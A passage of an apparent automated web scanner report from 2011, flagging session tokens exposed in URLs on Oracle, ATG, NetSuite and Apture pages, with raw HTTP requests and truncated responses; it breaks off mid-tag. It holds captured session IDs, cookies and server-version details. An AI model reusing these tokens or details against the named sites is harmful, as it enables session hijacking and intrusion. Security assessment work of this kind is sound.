HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:11:38 GMT Accept-Ranges: bytes Last-Modified: Mon, 28 Mar 2011 10:28:50 GMT Content-Type: text/html Content-Language: en Connection: Keep-Alive Keep-Alive: timeout=5, max=999 Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=161;ecid=30186686287409627,0) Content-Length: 233 var popupWindow = null; var flag = 0; function openPopup(url) { try { popupWindow = window.open(url, "popup_id", "scrollbars,resizable,width=800,height=600"); } catch (err) { flag = '1' +...[SNIP]...
8.25. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://myprofile.oracle.com
Path:
/EndUser/jscripts/s_code_profile.js
Issue detail
The URL in the request appears to contain a session token within the query string:https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356
Request
GET /EndUser/jscripts/s_code_profile.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1 Host: myprofile.oracle.com Connection: keep-alive Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:29:47 GMT Accept-Ranges: bytes Last-Modified: Wed, 14 Jul 2010 22:00:08 GMT Content-Type: text/html Content-Language: en Connection: Keep-Alive Keep-Alive: timeout=5, max=999 Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=249;ecid=30186699172311517,0) Content-Length: 1366 /* Setting the s_account */ function s_setAccount(){ var s_account=""; var curUrl = location.href; if(curUrl.indexOf(":7101") != -1 || curUrl.indexOf("-mktad") != -1 || curUrl.index...[SNIP]...
8.26. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://myprofile.oracle.com
Path:
/EndUser/jscripts/s_validation.js
Issue detail
The URL in the request appears to contain a session token within the query string:https://myprofile.oracle.com/EndUser/jscripts/s_validation.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356
Request
GET /EndUser/jscripts/s_validation.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1 Host: myprofile.oracle.com Connection: keep-alive Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:09:35 GMT Accept-Ranges: bytes Last-Modified: Fri, 18 Mar 2011 13:50:52 GMT Content-Type: text/html Content-Language: en Connection: Keep-Alive Keep-Alive: timeout=5, max=999 Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=242;ecid=30186729237082835,0) Content-Length: 4274 /* Used to attach and remove error message which are not set or removed on * server side validators. */ function checkOnLoad() { var inputs = document.getElementsByTagName('input'); var spans = ...[SNIP]...
8.27. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://netsuite.tt.omtrdc.net
Path:
/m2/netsuite/mbox/standard
Issue detail
The URL in the request appears to contain a session token within the query string:http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPage=1315341135013-154927&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=me-ecomm-form-test&mboxId=0&mboxTime=1315323135041&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fseo-landing-page%2Fecommerce%2Fecommerce-2.html%3Fgclid%3DCMyov8D4iKsCFSBCgwodRnXLzA&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&mboxVersion=40
Request
GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927 &mboxPage=1315341135013-154927&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=me-ecomm-form-test&mboxId=0&mboxTime=1315323135041&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fseo-landing-page%2Fecommerce%2Fecommerce-2.html%3Fgclid%3DCMyov8D4iKsCFSBCgwodRnXLzA&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&mboxVersion=40 HTTP/1.1 Host: netsuite.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]
Response
HTTP/1.1 200 OK P3P: CP="NOI DSP CURa OUR STP COM" Set-Cookie: mboxPC=1315341135013-154927.19; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 20-Sep-2011 15:32:28 GMT; Path=/m2/netsuite Content-Type: text/javascript Content-Length: 173 Date: Tue, 06 Sep 2011 15:32:27 GMT Server: Test & Target mboxFactories.get('default').get('me-ecomm-form-test',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315341135013-154927.19");
8.28. http://www.apture.com/js/apture.js
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.apture.com
Path:
/js/apture.js
Issue detail
The URL in the request appears to contain a session token within the query string:http://www.apture.com/js/apture.js?siteToken=H0arRY0
Request
GET /js/apture.js?siteToken=H0arRY0 HTTP/1.1 Host: www.apture.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AC=FQtL8KWd11
Response
HTTP/1.0 200 OK Content-Length: 2642 Vary: Accept-Encoding Cache-Control: no-cache, no-store, must-revalidate, max-age=0 P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT" Content-Type: text/javascript Date: Tue, 06 Sep 2011 15:33:01 GMT (function(){ var B=window.apture,A=window.apture=B||{}; if(!A.isApp){ A.prefs={};A.referer="http://www.readwriteweb.com/enterprise/2010/11/oracle.php";A.visitId="a0e3f59a335046f79ededb918544b382";A.u...[SNIP]...
8.29. http://www.atg.com/
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.atg.com
Path:
/
Issue detail
The response contains the following links that appear to contain session tokens:http://www.atg.com/en/products-services/education/schedule/?_DARGS=/en/includes/common/main-navigation.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+
Request
GET / HTTP/1.1 Host: www.atg.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0 X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ== Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Expires: Tue, 06 Sep 2011 15:32:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 15:32:21 GMT Content-Length: 53080 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <l...[SNIP]... <li class="bulleted"><a href="/en/products-services/education/schedule/?_DARGS=/en/includes/common/main-navigation.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+"> Course Schedule</a>...[SNIP]...
8.30. http://www.atg.com/en/solutions/
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.atg.com
Path:
/en/solutions/
Issue detail
The response contains the following links that appear to contain session tokens:http://www.atg.com/en/products-services/education/schedule/?_DARGS=/en/includes/common/main-navigation.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+
Request
GET /en/solutions/ HTTP/1.1 Host: www.atg.com Proxy-Connection: keep-alive Referer: http://www.atg.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.1.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0 X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ== Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Expires: Tue, 06 Sep 2011 15:35:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 15:35:05 GMT Content-Length: 42222 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <title>ATG Commerce So...[SNIP]... <li class="bulleted"><a href="/en/products-services/education/schedule/?_DARGS=/en/includes/common/main-navigation.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+"> Course Schedule</a>...[SNIP]...
8.31. http://www.atg.com/service/main.jsp
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.atg.com
Path:
/service/main.jsp
Issue detail
The response contains the following links that appear to contain session tokens:http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200191 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200192 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200194 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200195 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200197 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200199 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200200 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200202 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200216 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200219 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200227 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200228 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200229 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200230 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200231 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200232 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200236 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200238 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200239 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=3 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=300004 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=400004 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true&sfield=&dosearch=true&pn=1 http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true&sfield=&dosearch=true&pn=19.0
Request
GET /service/main.jsp?_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true HTTP/1.1 Host: www.atg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0 X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ== Content-Language: 7cd9f92e1f6617753dfce39 Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Expires: Tue, 06 Sep 2011 15:53:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 15:53:06 GMT Content-Length: 116200 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- $Id: //application/service/version/9.1/SelfService/src/web-apps/SelfSe...[SNIP]... <dt> <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200191"> Product & Services</a>...[SNIP]... <dd> <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200192"> Platform</a>, <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200199"> Applications</a>, <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200227"> Deployment and Performance</a>...[SNIP]... <dt> <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200192"> Platform</a>...[SNIP]... <dd> <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200195"> Adaptive Scenario Engine</a>, <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200197"> Content Administration</a>, <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200194"> Portal</a>...[SNIP]... <dt> <a 